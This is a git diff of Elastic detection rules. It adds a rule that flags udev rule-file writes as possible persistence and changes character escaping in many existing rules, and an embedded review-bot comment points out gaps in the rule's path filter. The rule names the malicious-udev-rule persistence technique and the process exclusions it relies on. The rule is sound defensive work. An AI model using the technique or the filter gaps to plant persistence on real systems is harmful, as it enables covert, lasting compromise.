@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for the creation of rule files that are used by systemd-udevd to manage device nodes and handle kernel device events in the Linux operating system. Systemd-udevd can be exploited for persistence by adversaries by creating malicious udev rules that trigger on specific events, executing arbitrary commands or payloads whenever a certain device is plugged in or recognized by the system.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through Systemd-udevd", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:\"linux\" and event.category:\"file\" and \nevent.type:(\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and \nfile.path:/lib/udev/* and process.executable:* and not (\n process.name:(\"dockerd\" or \"docker\" or \"dpkg\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"systemd-hwdb\" or\n \"podman\" or \"buildah\") or file.extension : (\"swp\" or \"swpx\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "054db96b-fd34-43b3-9af2-587b3bd33964", + "setup": "## Setup\n\nThis rule requires data 
coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "type": "new_terms", + "version": 1 + }, + "id": "054db96b-fd34-43b3-9af2-587b3bd33964_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json index 77be5f18e17..4232203be71 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json 
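Review bot: The `file.path:/lib/udev/*` filter in the new query only covers the `/lib/udev` tree, while the description says the rule monitors creation of udev rule files; if that is the intent, the admin-owned rules directory `/etc/udev/rules.d/` (and `/usr/lib/udev/rules.d/` on merged-/usr systems, where the sensor may report the canonical path) appears uncovered, and `/lib/udev/*` also matches non-rule content under that tree such as the helper binaries and `hwdb.d`. Something like `file.path:(/etc/udev/rules.d/* or /lib/udev/rules.d/* or /usr/lib/udev/rules.d/*)` would align the filter with the description, assuming the same wildcard semantics the other Linux file-path rules in this package rely on. Separately, the setup text links to `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, while the neighbouring links in the same string use `current`; the `current` form would avoid the link going stale.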
@@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json index beb878065df..81bed5f974c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_105.json 
@@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json index 6385c5dd257..1c9ebc7afe7 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_106.json 
@@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json index 71a650cc9ce..1678d92dc1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json index 2b95e4877db..7d7f44aa1db 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_104.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json index f08eb646c3b..8a694e0e323 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_105.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json index f7b53febe61..e7dc9cd1850 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json index 4fe5d12eeba..769108db766 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json index 81492c3b844..d3563a00353 100644 --- a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_108.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json index aabae3f733e..ff63adad472 100644 --- a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json 
+++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_1.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json
index 4e8742371b8..70ba5dbff07 100644
--- a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_2.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json
index d6aadc55488..45897db3203 100644
--- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_103.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json
index 4a1d1da03bc..b47de31541f 100644
--- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_104.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json
index b3e8ebd73da..b1b5469afb0 100644
--- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_105.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json
index bf2d63301e6..715d8870e48 100644
--- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_106.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json
index cccb9bc3912..c9279b5376c 100644
--- a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_107.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json index e3fa4863254..61c736d1c2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_105.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json index 3422c8ed55d..e743fa55d0a 100644 
--- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_106.json @@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json index 20b9b7b0093..33317f0df52 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_107.json 
@@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json index 0716a3da5f4..34e1abbc3c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_108.json 
@@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json index 3f3a4923af1..2d84d639121 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_109.json 
@@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json index 41687c8587c..7bd4c9be67f 100644 --- a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_110.json 
@@ -61,7 +61,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
